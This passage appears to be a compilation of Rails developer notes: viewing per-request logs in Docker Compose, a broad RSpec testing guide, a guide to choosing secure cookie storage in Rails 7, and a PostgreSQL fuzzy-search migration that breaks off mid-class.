  • Disk: SSD (fast read/write for images & volumes)

💡 Reason it’s lighter than “normal” VMs:
Docker doesn’t need a full OS with GUI in its VM — just the kernel & minimal services to run containers.


Quick Recap Table:

Term       | Purpose                     | Persistent?
Image      | App blueprint               | Yes (stored on disk)
Container  | Running app from image      | No (dies when stopped unless data is in a volume)
Volume     | Data storage for containers | Yes
Compose    | Multi-container management  | Yes (config file)
Kubernetes | Cluster-level orchestration | N/A

Quickest way to see per-request Rails logs in Docker

  • Run app logs:
docker compose logs -f --tail=200 main-app
  • Run Sidekiq logs:
docker compose logs -f --tail=200 sidekiq
  • Filter for a single request by its request ID (see below):
docker compose logs -f main-app | rg 'request_id=YOUR_ID'

Ensure logs are emitted to STDOUT (so Docker can collect them)

Your images already set RAILS_LOG_TO_STDOUT=true and the app routes logs to STDOUT:

if ENV["RAILS_LOG_TO_STDOUT"].present?
  logger           = ActiveSupport::Logger.new(STDOUT)
  logger.formatter = config.log_formatter
  config.log_tags  = [:subdomain, :uuid]
  config.logger    = ActiveSupport::TaggedLogging.new(logger)
end

So the docker compose logs commands above are the right way. Tailing log files inside the container usually isn’t needed, but if you want to:

docker compose exec main-app bash -lc 'tail -f log/development.log'

Trace a single request end-to-end

  • Get the request ID from the response (Rails sets X-Request-Id):
REQ=$(curl -s -D - http://localhost:3001/your/path -o /dev/null | awk '/X-Request-Id/ {print $2}' | tr -d '\r')
docker compose logs -f main-app | rg "$REQ"
  • Your app tags logs with a UUID per request; switching to the canonical tag makes grepping easier. Optionally change tags to:
# in `website-v1/config/application.rb`
config.log_tags = [:request_id]

Make logs easier to read (optional, but highly recommended)

  • Add concise, per-request logging (1 line per request) with JSON output for easy grep/parse:
# Gemfile
gem 'lograge'

# config/initializers/lograge.rb
Rails.application.configure do
  config.lograge.enabled = true
  config.lograge.formatter = Lograge::Formatters::Json.new
  config.lograge.custom_options = lambda do |event|
    {
      request_id: event.payload[:request_id],
      params: event.payload[:params].except('controller','action'),
      user_id: event.payload[:user_id],
      time: Time.now.utc
    }
  end
end

Then:

bundle install
docker compose restart main-app
docker compose logs -f main-app

Now you can grep easily:

# --no-log-prefix drops the "main-app | " prefix so jq can parse each JSON line
docker compose logs -f --no-log-prefix main-app | jq -r 'select(.request_id=="'"$REQ"'")'

Tuning

  • In development, you already have config.log_level = :debug. For production, consider :info instead of :warn to get request lines:
# config/environments/production.rb
config.log_level = :info
  • Sidekiq logs are a separate stream (service sidekiq); use its logs for background job tracing.
  • Noise reduction: you already have config.assets.quiet = true in development.

To take this further, switch the log tags to :request_id and add lograge with JSON output as shown above.

Recap:

  • Stream logs from main-app and sidekiq with docker compose logs.
  • Logs are already routed to STDOUT via RAILS_LOG_TO_STDOUT and TaggedLogging in application.rb.
  • Optional improvements (:request_id tagging plus lograge JSON) make it easy to grep a single request by its ID.

Complete Guide to RSpec with Rails 7+: From Basics to Advanced Testing

RSpec is the most popular testing framework for Ruby and Rails applications. This comprehensive guide covers everything from basic RSpec syntax to advanced Rails 7+ testing patterns, with real-world examples and scenarios.

Table of Contents

  1. RSpec Basics
  2. Rails 7+ Integration
  3. Core RSpec Methods
  4. Testing Scenarios
  5. Advanced Features
  6. Best Practices

RSpec Basics

Basic Structure

require "rails_helper"

RSpec.describe Session::AppliedDiscount do
  # Test content goes here
end

Key Components:

  • require "rails_helper" – Loads Rails testing environment
  • RSpec.describe – Groups related tests
  • describe can take a class, string, or symbol

The Building Blocks

describe and context

RSpec.describe User do
  describe "#full_name" do
    context "when first and last name are present" do
      # tests here
    end

    context "when only first name is present" do
      # tests here
    end
  end

  describe ".active_users" do
    context "with active users in database" do
      # tests here
    end
  end
end

it – Individual Test Cases

it "returns the user's full name" do
  user = User.new(first_name: "John", last_name: "Doe")
  expect(user.full_name).to eq("John Doe")
end

it "handles missing last name gracefully" do
  user = User.new(first_name: "John")
  expect(user.full_name).to eq("John")
end

Core RSpec Methods

let and let!

Lazy Evaluation with let
RSpec.describe Session::Discount do
  let(:cookies) { CookiesStub.new }
  let(:code) { create_code(10) }
  let(:customer) { init_customer }
  let(:customer_code) { create_customer_code(customer) }

  it "uses lazy evaluation" do
    # code is only created when first accessed
    expect(code.amount).to eq(10)
  end
end
Immediate Evaluation with let!
let!(:user) { User.create(name: "John") }  # Created immediately
let(:profile) { user.profile }             # Created when accessed

it "has user already created" do
  expect(User.count).to eq(1)  # user already exists
end

subject

Implicit Subject
RSpec.describe User do
  let(:user_params) { { name: "John", email: "john@example.com" } }

  subject { User.new(user_params) }

  it { is_expected.to be_valid }
  it { is_expected.to respond_to(:full_name) }
end
Named Subject
describe '#initial_discount' do
  subject(:initial_discount_in_rupee) { 
    described_class.new(cookies: cookies).initial_discount_in_rupee 
  }

  it 'returns initial discount for customer' do
    accessor.set_customer_code(customer_code: customer_code)
    expect(initial_discount_in_rupee).to eq(expected_amount)
  end
end

expect and Matchers

Basic Matchers
# Equality
expect(user.name).to eq("John")
expect(user.age).to be > 18
expect(user.email).to include("@")

# Boolean checks
expect(user).to be_valid
expect(user.active?).to be true
expect(user.admin?).to be_falsy

# Type checks
expect(user.created_at).to be_a(Time)
expect(user.tags).to be_an(Array)
Collection Matchers
expect(users).to include(john_user)
expect(user.roles).to contain_exactly("admin", "user")
expect(shopping_cart.items).to be_empty
expect(search_results).to have(3).items  # needs the rspec-collection_matchers gem in RSpec 3+
String Matchers
expect(user.email).to match(/\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i)
expect(response.body).to include("Welcome")
expect(error_message).to start_with("Error:")
expect(success_message).to end_with("successfully!")

Rails 7+ Integration

Rails Helper Setup

# spec/rails_helper.rb
require 'spec_helper'
ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'

abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'rspec/rails'

RSpec.configure do |config|
  config.fixture_path = "#{::Rails.root}/spec/fixtures"
  config.use_transactional_fixtures = true
  config.infer_spec_type_from_file_location!
  config.filter_rails_from_backtrace!
end

Testing Controllers

RSpec.describe Api::V1::SessionsController, type: :controller do
  let(:user) { create(:user) }
  let(:valid_params) { { email: user.email, password: "password" } }

  describe "POST #create" do
    context "with valid credentials" do
      it "returns success response" do
        post :create, params: valid_params
        expect(response).to have_http_status(:success)
        expect(JSON.parse(response.body)["success"]).to be true
      end

      it "sets authentication token" do
        post :create, params: valid_params
        expect(response.cookies["auth_token"]).to be_present
      end
    end

    context "with invalid credentials" do
      it "returns unauthorized status" do
        post :create, params: { email: user.email, password: "wrong" }
        expect(response).to have_http_status(:unauthorized)
      end
    end
  end
end

Testing Models

RSpec.describe User, type: :model do
  describe "validations" do
    it { is_expected.to validate_presence_of(:email) }
    it { is_expected.to validate_uniqueness_of(:email) }
    it { is_expected.to validate_length_of(:password).is_at_least(8) }
  end

  describe "associations" do
    it { is_expected.to have_many(:orders) }
    it { is_expected.to belong_to(:organization) }
    it { is_expected.to have_one(:profile) }
  end

  describe "scopes" do
    let!(:active_user) { create(:user, :active) }
    let!(:inactive_user) { create(:user, :inactive) }

    it "returns only active users" do
      expect(User.active).to include(active_user)
      expect(User.active).not_to include(inactive_user)
    end
  end
end

Testing Scenarios

Testing Service Objects

RSpec.describe Session::Discount do
  let(:cookies) { CookiesStub.new }
  let(:accessor) { Session::CookieDiscount.new(cookies) }

  describe '#initialize' do
    it 'calls ClearDiscountCode' do
      expect_any_instance_of(Session::ClearDiscountCode).to receive(:run)
      described_class.new(cookies: cookies)
    end

    it 'removes discount_code if referral_code presented' do
      accessor.set_code(discount)
      accessor.set_referral_code(referral_code: code)

      described_class.new(cookies: cookies)
      expect(accessor.discount).to be nil
    end
  end
end

Testing API Endpoints

RSpec.describe "API V1 Sessions", type: :request do
  let(:headers) { { "Content-Type" => "application/json" } }

  describe "POST /api/v1/sessions" do
    let(:user) { create(:user) }
    let(:params) do
      {
        session: {
          email: user.email,
          password: "password"
        }
      }
    end

    it "creates a new session" do
      post "/api/v1/sessions", params: params.to_json, headers: headers

      expect(response).to have_http_status(:created)
      expect(json_response["user"]["id"]).to eq(user.id)
      expect(json_response["token"]).to be_present
    end

    context "with invalid credentials" do
      before { params[:session][:password] = "wrong_password" }

      it "returns error" do
        post "/api/v1/sessions", params: params.to_json, headers: headers

        expect(response).to have_http_status(:unauthorized)
        expect(json_response["error"]).to eq("Invalid credentials")
      end
    end
  end
end

Testing Background Jobs

RSpec.describe EmailNotificationJob, type: :job do
  include ActiveJob::TestHelper

  let(:user) { create(:user) }

  describe "#perform" do
    it "sends welcome email" do
      expect {
        EmailNotificationJob.perform_now(user.id, "welcome")
      }.to change { ActionMailer::Base.deliveries.count }.by(1)
    end

    it "enqueues job" do
      expect {
        EmailNotificationJob.perform_later(user.id, "welcome")
      }.to have_enqueued_job(EmailNotificationJob)
    end
  end
end

Testing with Database Transactions

RSpec.describe OrderProcessor do
  describe "#process" do
    let(:order) { create(:order, :pending) }
    let(:payment_method) { create(:payment_method) }

    it "processes order successfully" do
      expect {
        OrderProcessor.new(order).process(payment_method)
      }.to change { order.reload.status }.from("pending").to("completed")
    end

    it "handles payment failures" do
      allow(payment_method).to receive(:charge).and_raise(PaymentError)

      expect {
        OrderProcessor.new(order).process(payment_method)
      }.to raise_error(PaymentError)

      expect(order.reload.status).to eq("failed")
    end
  end
end

Advanced Features

Shared Examples

# spec/support/shared_examples/auditable.rb
RSpec.shared_examples "auditable" do
  it "tracks creation" do
    expect(subject.created_at).to be_present
    expect(subject.created_by).to eq(current_user)
  end

  it "tracks updates" do
    subject.update(name: "Updated Name")
    expect(subject.updated_by).to eq(current_user)
  end
end

# Usage in specs
RSpec.describe User do
  let(:current_user) { create(:user) }
  subject { create(:user) }

  it_behaves_like "auditable"
end

Custom Matchers

# spec/support/matchers/be_valid_email.rb
RSpec::Matchers.define :be_valid_email do
  match do |actual|
    actual =~ /\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i
  end

  failure_message do |actual|
    "expected #{actual} to be a valid email address"
  end
end

# Usage
expect(user.email).to be_valid_email

Hooks and Callbacks

RSpec.describe User do
  include ActiveSupport::Testing::TimeHelpers  # provides travel_to / travel_back

  before(:each) do
    @original_time = Time.current
    travel_to Time.zone.parse("2023-01-01 12:00:00")
  end

  after(:each) do
    travel_back
  end

  before(:all) do
    # Runs once before all tests in this describe block
    @test_data = create_test_data
  end

  around(:each) do |example|
    Rails.logger.silence do
      example.run
    end
  end
end

Stubbing and Mocking

describe "external API integration" do
  let(:api_client) { instance_double("APIClient") }

  before do
    allow(APIClient).to receive(:new).and_return(api_client)
  end

  it "calls external service" do
    expect(api_client).to receive(:get_user_data).with(user.id)
      .and_return({ name: "John", email: "john@example.com" })

    result = UserDataService.fetch(user.id)
    expect(result[:name]).to eq("John")
  end

  it "handles API errors gracefully" do
    allow(api_client).to receive(:get_user_data).and_raise(Net::ReadTimeout)

    expect {
      UserDataService.fetch(user.id)
    }.to raise_error(ServiceUnavailableError)
  end
end

Testing Time-dependent Code

describe "subscription expiry" do
  let(:subscription) { create(:subscription, expires_at: 2.days.from_now) }

  it "is not expired when current" do
    expect(subscription).not_to be_expired
  end

  it "is expired when past expiry date" do
    travel_to 3.days.from_now do
      expect(subscription).to be_expired
    end
  end
end

Factory Bot Integration

Basic Factory Setup

# spec/factories/users.rb
FactoryBot.define do
  factory :user do
    sequence(:email) { |n| "user#{n}@example.com" }
    first_name { "John" }
    last_name { "Doe" }
    password { "password123" }

    trait :admin do
      role { "admin" }
    end

    trait :with_profile do
      after(:create) do |user|
        create(:profile, user: user)
      end
    end

    factory :admin_user, traits: [:admin]
  end
end

# Usage in tests
let(:user) { create(:user) }
let(:admin) { create(:user, :admin) }
let(:user_with_profile) { create(:user, :with_profile) }

Advanced Factory Patterns

# spec/factories/orders.rb
FactoryBot.define do
  factory :order do
    user
    total_amount { 100.00 }
    status { "pending" }

    factory :completed_order do
      status { "completed" }
      completed_at { Time.current }

      after(:create) do |order|
        create_list(:order_item, 3, order: order)
      end
    end
  end
end

Testing Different Types

Feature Tests (System Tests)

RSpec.describe "User Registration", type: :system do
  it "allows user to register" do
    visit "/signup"

    fill_in "Email", with: "test@example.com"
    fill_in "Password", with: "password123"
    fill_in "Confirm Password", with: "password123"

    click_button "Sign Up"

    expect(page).to have_content("Welcome!")
    expect(page).to have_current_path("/dashboard")
  end
end

Mailer Tests

RSpec.describe UserMailer, type: :mailer do
  describe "#welcome_email" do
    let(:user) { create(:user) }
    let(:mail) { UserMailer.welcome_email(user) }

    it "sends to correct recipient" do
      expect(mail.to).to eq([user.email])
    end

    it "has correct subject" do
      expect(mail.subject).to eq("Welcome to Our App!")
    end

    it "includes user name in body" do
      expect(mail.body.encoded).to include(user.first_name)
    end
  end
end

Helper Tests

RSpec.describe ApplicationHelper, type: :helper do
  describe "#format_currency" do
    it "formats positive amounts" do
      expect(helper.format_currency(100.50)).to eq("$100.50")
    end

    it "handles zero amounts" do
      expect(helper.format_currency(0)).to eq("$0.00")
    end

    it "formats negative amounts" do
      expect(helper.format_currency(-50.25)).to eq("-$50.25")
    end
  end
end

Best Practices

1. Clear Test Structure

# Good: Clear, descriptive names
describe User do
  describe "#full_name" do
    context "when both names are present" do
      it "returns concatenated first and last name" do
        # test implementation
      end
    end
  end
end

# Bad: Unclear names
describe User do
  it "works" do
    # test implementation
  end
end

2. One Assertion Per Test

# Good: Single responsibility
it "validates email presence" do
  user = User.new(email: nil)
  expect(user).not_to be_valid
end

it "validates email format" do
  user = User.new(email: "invalid-email")
  expect(user).not_to be_valid
end

# Bad: Multiple assertions
it "validates email" do
  user = User.new(email: nil)
  expect(user).not_to be_valid

  user.email = "invalid-email"
  expect(user).not_to be_valid

  user.email = "valid@email.com"
  expect(user).to be_valid
end

3. Use let for Test Data

# Good: Reusable and lazy-loaded
let(:user) { create(:user, email: "test@example.com") }
let(:order) { create(:order, user: user, total: 100) }

it "calculates tax correctly" do
  expect(order.tax_amount).to eq(8.50)
end

# Bad: Repeated setup
it "calculates tax correctly" do
  user = create(:user, email: "test@example.com")
  order = create(:order, user: user, total: 100)
  expect(order.tax_amount).to eq(8.50)
end

4. Meaningful Error Messages

# Good: Custom error messages
expect(discount.amount).to eq(50), 
  "Expected discount amount to be $50 for premium users"

# Good: Descriptive matchers
expect(user.subscription).to be_active,
  "User subscription should be active after successful payment"

5. Test Edge Cases

describe "#divide" do
  it "divides positive numbers" do
    expect(calculator.divide(10, 2)).to eq(5)
  end

  it "handles division by zero" do
    expect { calculator.divide(10, 0) }.to raise_error(ZeroDivisionError)
  end

  it "handles negative numbers" do
    expect(calculator.divide(-10, 2)).to eq(-5)
  end

  it "handles float precision" do
    expect(calculator.divide(1, 3)).to be_within(0.001).of(0.333)
  end
end

Rails 7+ Specific Features

Testing with ActionText

RSpec.describe Post, type: :model do
  describe "rich text content" do
    let(:post) { create(:post) }

    it "can store rich text content" do
      post.content = "<p>Hello <strong>world</strong></p>"
      expect(post.content.to_s).to include("Hello")
      expect(post.content.to_s).to include("<strong>world</strong>")
    end
  end
end

Testing with Active Storage

RSpec.describe User, type: :model do
  describe "avatar attachment" do
    let(:user) { create(:user) }
    let(:image) { fixture_file_upload("spec/fixtures/avatar.jpg", "image/jpeg") }

    it "can attach avatar" do
      user.avatar.attach(image)
      expect(user.avatar).to be_attached
      expect(user.avatar.content_type).to eq("image/jpeg")
    end
  end
end

Testing Hotwire/Turbo

RSpec.describe "Todo Management", type: :system do
  it "updates todo via turbo stream" do
    todo = create(:todo, title: "Original Title")

    visit todos_path
    click_link "Edit"
    fill_in "Title", with: "Updated Title"
    click_button "Update"

    expect(page).to have_content("Updated Title")
    expect(page).not_to have_content("Original Title")
    # Verify it was updated via AJAX, not full page reload
    expect(page).not_to have_selector(".flash-message")
  end
end

Configuration and Setup

RSpec Configuration

# spec/rails_helper.rb
RSpec.configure do |config|
  # Database cleaner
  config.use_transactional_fixtures = true

  # Factory Bot
  config.include FactoryBot::Syntax::Methods

  # Custom helpers
  config.include AuthenticationHelpers, type: :request
  config.include ControllerHelpers, type: :controller

  # Filtering
  config.filter_run_when_matching :focus
  config.example_status_persistence_file_path = "spec/examples.txt"

  # Random ordering (helps surface order-dependent specs)
  config.order = :random
  Kernel.srand config.seed
end

Database Cleaner Setup

# spec/rails_helper.rb
require 'database_cleaner/active_record'

RSpec.configure do |config|
  config.before(:suite) do
    DatabaseCleaner.strategy = :transaction
    DatabaseCleaner.clean_with(:truncation)
  end

  config.around(:each) do |example|
    DatabaseCleaner.cleaning do
      example.run
    end
  end
end

This comprehensive guide covers the essential RSpec patterns you’ll use in Rails 7+ applications. The examples shown are based on real-world scenarios and follow current best practices for maintainable, reliable test suites.

Remember: Good tests are documentation for your code – they should clearly express what your application does and how it should behave under different conditions.


The Complete Guide to Cookie Storage in Rails 7: Security, Performance, and Best Practices

Cookies are fundamental to web applications, but choosing the right storage method can make or break your app’s security and performance. Rails 7 offers multiple cookie storage mechanisms, each with distinct security properties and use cases. Let’s explore when to use each approach and why it matters.

The Cookie Storage Spectrum

Rails provides four main cookie storage methods, each offering different levels of security:

# 1. Plain cookies - readable and modifiable by client
cookies[:theme] = 'dark'

# 2. Signed cookies - readable but tamper-proof
cookies.signed[:discount_code] = 'SAVE10'

# 3. Encrypted cookies - hidden and tamper-proof
cookies.encrypted[:user_preferences] = { notifications: true }

# 4. Session storage - server-side with encrypted session cookie
session[:current_user_id] = user.id

1. Plain Cookies: When Transparency is Acceptable

Use for: Non-sensitive data where client-side reading/modification is acceptable or even desired.

# Setting a plain cookie
cookies[:theme] = 'dark'
cookies[:language] = 'en'
cookies[:consent_given] = 'true'

# With expiration
cookies[:temporary_banner_dismissed] = {
  value: 'true',
  expires: 1.day.from_now
}

Security implications:

  • ✅ Fast and simple
  • ❌ Completely readable in browser dev tools
  • ❌ User can modify values freely
  • ❌ No protection against tampering

Best for:

  • UI preferences (theme, language)
  • Non-critical flags (banner dismissal)
  • Data you want JavaScript to access easily

2. Signed Cookies: Tamper-Proof but Visible

Signed cookies prevent modification while remaining readable. Rails uses HMAC-SHA1 with your secret_key_base to create a cryptographic signature.

# Setting signed cookies
cookies.signed[:discount_code] = 'SAVE10'
cookies.signed[:referral_source] = 'google_ads'

# Reading signed cookies
discount = cookies.signed[:discount_code]  # Returns 'SAVE10' or nil if tampered

How it works:

# Rails internally does:
# 1. Create signature: HMAC-SHA1(secret_key_base, 'SAVE10')
# 2. Store: Base64.encode64('SAVE10--signature')
# 3. On read: verify signature matches content
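
You can see the same mechanism outside a controller with ActiveSupport::MessageVerifier, the class Rails uses under the hood. This is a minimal sketch — the secret here is illustrative, and a real app derives its signing key from secret_key_base:

require "active_support"
require "active_support/message_verifier"

verifier = ActiveSupport::MessageVerifier.new("an_example_secret", digest: "SHA1")

signed = verifier.generate("SAVE10")   # => "BAh...--<hmac signature>"
verifier.verified(signed)              # => "SAVE10"

# Tampering with the payload invalidates the signature
payload, signature = signed.split("--")
verifier.verified("tampered--#{signature}")  # => nil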

Security implications:

  • ✅ Tamper-proof – modification invalidates the cookie
  • ✅ Prevents privilege escalation attacks
  • ⚠️ Content still visible (Base64 encoded)
  • ❌ Not suitable for truly sensitive data

Real-world example from our codebase:

# lib/session/cookie_discount_accessor.rb
def discount_code
  # Prevents users from changing 'SAVE10' to 'SAVE50' in browser
  @cookies.signed[:discount] && DiscountCode.find_by(name: @cookies.signed[:discount])
end

def set_discount_code(code)
  @cookies.signed[:discount] = {
    value: code.name,
    expires: code.expiration || 30.days.from_now
  }
end

Best for:

  • Discount codes
  • Referral tracking
  • Non-sensitive IDs that shouldn’t be modified
  • Data integrity without confidentiality requirements

3. Encrypted Cookies: Maximum Security

Encrypted cookies are both signed and encrypted, making them unreadable and tamper-proof.

# Setting encrypted cookies
cookies.encrypted[:credit_card_last4] = '4242'
cookies.encrypted[:user_preferences] = {
  notifications: true,
  marketing_emails: false
}

# Reading encrypted cookies
preferences = cookies.encrypted[:user_preferences]

Security implications:

  • ✅ Content completely hidden from client
  • ✅ Tamper-proof
  • ✅ Suitable for sensitive data
  • ⚠️ Slightly higher CPU overhead
  • ⚠️ Size limitations (4KB total per domain)

Best for:

  • Personal information
  • Financial data
  • Complex user preferences
  • Any data you’d store in a database but need client-side

4. Session Storage: Server-Side Security

Rails sessions use an encrypted cookie store by default, so the data still travels in a client-side cookie, but you treat it as server-managed state.

# Session storage
session[:current_user_id] = user.id
session[:shopping_cart] = cart.to_h
session[:two_factor_verified] = true

# Configuration in config/application.rb
config.session_store :cookie_store, key: '_myapp_session'

Security implications:

  • ✅ Encrypted by default
  • ✅ Automatic expiration handling
  • ✅ CSRF protection integration
  • ⚠️ 4KB size limit
  • ⚠️ Lost on cookie deletion

Best for:

  • User authentication state
  • Shopping carts
  • Multi-step form data
  • Security-sensitive flags

Security Best Practices

1. Choose the Right Storage Method

# ❌ Don't store sensitive data in plain cookies
cookies[:ssn] = '123-45-6789'  # Visible to everyone!

# ✅ Use appropriate security level
cookies.encrypted[:ssn] = '123-45-6789'  # Hidden and protected
session[:user_id] = user.id              # Server-side, encrypted

2. Set Proper Cookie Attributes

# Secure cookies for HTTPS
cookies[:theme] = {
  value: 'dark',
  secure: Rails.env.production?,  # HTTPS only
  httponly: true,                 # No JavaScript access
  samesite: :strict              # CSRF protection
}

3. Handle Cookie Tampering Gracefully

def current_discount_code
  code_name = cookies.signed[:discount]
  return nil unless code_name

  DiscountCode.find_by(name: code_name)&.tap do |code|
    # Remove if expired or invalid
    cookies.delete(:discount) unless code.usable?
  end
end

4. Use Expiration Strategically

# Short-lived sensitive data
cookies.signed[:password_reset_token] = {
  value: token,
  expires: 15.minutes.from_now,
  secure: true,
  httponly: true
}

# Long-lived preferences
cookies.encrypted[:user_preferences] = {
  value: preferences.to_json,
  expires: 1.year.from_now
}

Advanced Patterns

1. Cookie Accessor Classes

Create dedicated classes for complex cookie management:

class Session::CookieDiscountAccessor
  def initialize(cookies)
    @cookies = cookies
  end

  def discount_code
    @cookies.signed[:discount] && DiscountCode.find_by(name: @cookies.signed[:discount])
  end

  def set_discount_code(code)
    @cookies.signed[:discount] = {
      value: code.name,
      expires: code.expiration || 30.days.from_now
    }
  end

  def remove_discount_code
    @cookies.delete(:discount)
  end
end

2. Validation and Cleanup

class Session::CheckAndRemoveDiscountCode
  def initialize(cookies:)
    @accessor = Session::CookieDiscountAccessor.new(cookies)
  end

  def run
    # A referral code takes precedence, so drop any stored discount code
    if @accessor.referral_code
      @accessor.remove_discount_code
      return
    end

    # Remove expired or otherwise unusable codes
    discount_code = @accessor.discount_code
    @accessor.remove_discount_code if discount_code && !discount_code.usable?
  end
end

3. Error Handling for Corrupted Cookies

def safe_read_encrypted_cookie(key)
  cookies.encrypted[key]
rescue ActiveSupport::MessageVerifier::InvalidSignature,
       ActiveSupport::MessageEncryptor::InvalidMessage
  # Cookie was corrupted or created with different secret
  cookies.delete(key)
  nil
end

Performance Considerations

Cookie Size Limits

  • Total limit: 4KB per domain
  • Individual limit: ~4KB per cookie
  • Count limit: ~50 cookies per domain
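
Because oversized cookies are silently truncated or dropped by browsers, it helps to surface the problem during development. Below is a hypothetical concern (CookieSizeGuard is an illustrative name, not a Rails API) that logs a warning whenever a Set-Cookie header exceeds the practical limit:

module CookieSizeGuard
  extend ActiveSupport::Concern

  MAX_COOKIE_BYTES = 4096 # practical per-cookie limit in most browsers

  included do
    after_action :warn_about_oversized_cookies, if: -> { Rails.env.development? }
  end

  private

  def warn_about_oversized_cookies
    set_cookie = response.headers["Set-Cookie"]
    headers = set_cookie.is_a?(Array) ? set_cookie : set_cookie.to_s.split("\n")

    headers.each do |header|
      next if header.bytesize <= MAX_COOKIE_BYTES

      Rails.logger.warn("Oversized cookie (#{header.bytesize} bytes): #{header[0, 60]}...")
    end
  end
end

Include it in ApplicationController to cover every response.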

CPU Overhead

# Benchmark different storage methods
require 'benchmark'

Benchmark.bm do |x|
  x.report("plain")     { 1000.times { cookies[:test] = 'value' } }
  x.report("signed")    { 1000.times { cookies.signed[:test] = 'value' } }
  x.report("encrypted") { 1000.times { cookies.encrypted[:test] = 'value' } }
end

# Results (approximate):
#                user     system      total        real
# plain      0.001000   0.000000   0.001000 (  0.001000)
# signed     0.010000   0.000000   0.010000 (  0.009000)
# encrypted  0.050000   0.000000   0.050000 (  0.048000)

Configuration and Security Headers

Session Configuration

# config/application.rb
config.session_store :cookie_store,
  key: '_myapp_session',
  secure: Rails.env.production?,
  httponly: true,
  expire_after: 14.days,
  same_site: :lax

Security Headers

# config/application.rb
config.force_ssl = true  # HTTPS in production

# Use Secure Headers gem
SecureHeaders::Configuration.default do |config|
  config.cookies = {
    secure: true,
    httponly: true,
    samesite: {
      lax: true
    }
  }
end

Testing Cookie Security

# spec/lib/session/cookie_discount_accessor_spec.rb
RSpec.describe Session::CookieDiscountAccessor do
  describe 'cookie tampering protection' do
    it 'handles corrupted signed cookies gracefully' do
      # Simulate tampered cookie
      cookies.signed[:discount] = 'SAVE10'
      cookies[:discount] = 'tampered_value'  # Direct manipulation

      accessor = Session::CookieDiscountAccessor.new(cookies)
      expect(accessor.discount_code).to be_nil
    end
  end
end

Migration Strategies

Upgrading Cookie Security

def upgrade_cookie_security
  # Read from old plain cookie
  if (old_value = cookies[:legacy_data])
    # Migrate to encrypted
    cookies.encrypted[:legacy_data] = old_value
    cookies.delete(:legacy_data)
  end
end

Handling Secret Key Rotation

# config/credentials.yml.enc
secret_key_base: new_secret
legacy_secret_key_base: old_secret

# In application code (simplified illustration)
def read_with_fallback(key)
  cookies.encrypted[key] || begin
    # NOTE: simplified – real encrypted cookies derive their key from
    # secret_key_base via ActiveSupport::KeyGenerator, so decrypting the raw
    # cookie value this way will not work unmodified. For production key
    # rotation, prefer config.action_dispatch.cookies_rotations.
    old_encryptor = ActiveSupport::MessageEncryptor.new(
      Rails.application.credentials.legacy_secret_key_base
    )
    old_encryptor.decrypt_and_verify(cookies[key])
  rescue StandardError
    nil
  end
end

Quick Decision Matrix

Data Type          | Sensitivity | Client Access Needed | Recommended Storage
Theme preferences  | Low         | Yes                  | Plain cookies
Discount codes     | Medium      | No                   | Signed cookies
User settings      | Medium      | No                   | Encrypted cookies
Authentication     | High        | No                   | Session
Credit card data   | High        | No                   | Database + session ID
Shopping cart      | Medium      | No                   | Session or encrypted
CSRF tokens        | High        | Limited              | Session (built-in)

Common Pitfalls to Avoid

  1. Don’t mix storage types for the same data
   # ❌ Inconsistent
   cookies[:user_id] = user.id        # Sometimes
   cookies.signed[:user_id] = user.id # Other times

   # ✅ Consistent
   session[:user_id] = user.id        # Always
  2. Don’t store large objects in cookies
   # ❌ Will hit 4KB limit
   cookies.encrypted[:full_user] = user.to_json

   # ✅ Store reference
   session[:user_id] = user.id
  3. Don’t forget expiration
   # ❌ Never expires
   cookies.signed[:temp_token] = token

   # ✅ Proper expiration
   cookies.signed[:temp_token] = {
     value: token,
     expires: 1.hour.from_now
   }

Conclusion

Cookie storage in Rails 7 offers a rich toolkit for different security and performance needs. The key is matching the storage method to your data’s sensitivity and access patterns:

  • Plain cookies for non-sensitive, client-accessible data
  • Signed cookies when you need tamper protection but not confidentiality
  • Encrypted cookies for sensitive data that must remain client-side
  • Session storage for server-side state with automatic encryption

Remember: the best cookie strategy combines appropriate storage methods with proper security headers, validation, and graceful error handling. When in doubt, err on the side of more security rather than less.

The Rails cookie system is designed to make secure defaults easy—take advantage of it to build applications that are both performant and secure.


Rails 8 Application: Implement PostgreSQL search on products

Here’s a concise analysis and solution:

Full-Text Search Strategy

For name column:

  • Recommended: Use a GIN index with pg_trgm extension
  • Benefits:
    • Faster than LIKE/ILIKE
    • Supports partial matches
    • Handles typos with similarity function

For description column:

  • Recommendation: Add a separate searchable column
  • Why?:
    • Text fields can be large
    • Better to index a pre-processed version
    • Consider using tsvector for better performance

Implementation Steps:

  1. First, create a migration to update the indexes:
# db/migrate/[timestamp]_add_search_to_products.rb

class AddSearchToProducts < ActiveRecord::Migration[8.0]
  def change
    # Enable pg_trgm extension for fuzzy matching
    enable_extension 'pg_trgm' unless extension_enabled?('pg_trgm')
    
    # Add a searchable column for description (optional)
    add_column :products, :searchable_description, :tsvector
    add_index :products, :searchable_description, using: :gin

    # Replace the simple index with a trigram GIN index for name
    remove_index :products, name: 'idx_products_name'
    add_index :products, :name, using: :gin, opclass: :gin_trgm_ops, name: 'index_products_on_name_trgm'
    
    # Populate searchable_description for existing rows
    execute <<-SQL
      UPDATE products 
      SET searchable_description = to_tsvector('english', coalesce(description, ''));
    SQL
  end
end
  2. In your Product model:
# app/models/product.rb
class Product < ApplicationRecord
  # For name search
  def self.search_by_name(query)
    where("name % ?", query)
      .order(Arel.sql(sanitize_sql_array(["similarity(name, ?) DESC", query])))
  end

  # For description search (if needed)
  def self.search_in_description(query)
    where("searchable_description @@ plainto_tsquery('english', :q)", q: query)
  end
end

Usage:

# Search in name (fuzzy matching)
products = Product.search_by_name("laptp")  # Will match "laptop"

# Search in description (exact matching)
products = Product.search_in_description("high performance")

Recommendation:

  1. Start with name-only search – It’s the most common use case
  2. Monitor performance – Check query times with EXPLAIN ANALYZE (see the console sketch after this list)
  3. Add description search later if needed, using the searchable_description column
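
For step 2, a quick way to check query plans from the Rails console (explain(:analyze) assumes Rails 7.1+; plain explain works on older versions):

# Inspect the query plan used by the trigram search
puts Product.search_by_name("laptop").explain

# Rails 7.1+ can pass options through to PostgreSQL's EXPLAIN
# puts Product.search_by_name("laptop").explain(:analyze)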

Let’s implement a unified search that looks for matches in both name and description. Here’s a streamlined approach using PostgreSQL’s full-text search capabilities:

1. First, create a migration to add search functionality:

# db/migrate/[timestamp]_add_search_to_products.rb
class AddSearchToProducts < ActiveRecord::Migration[8.0]
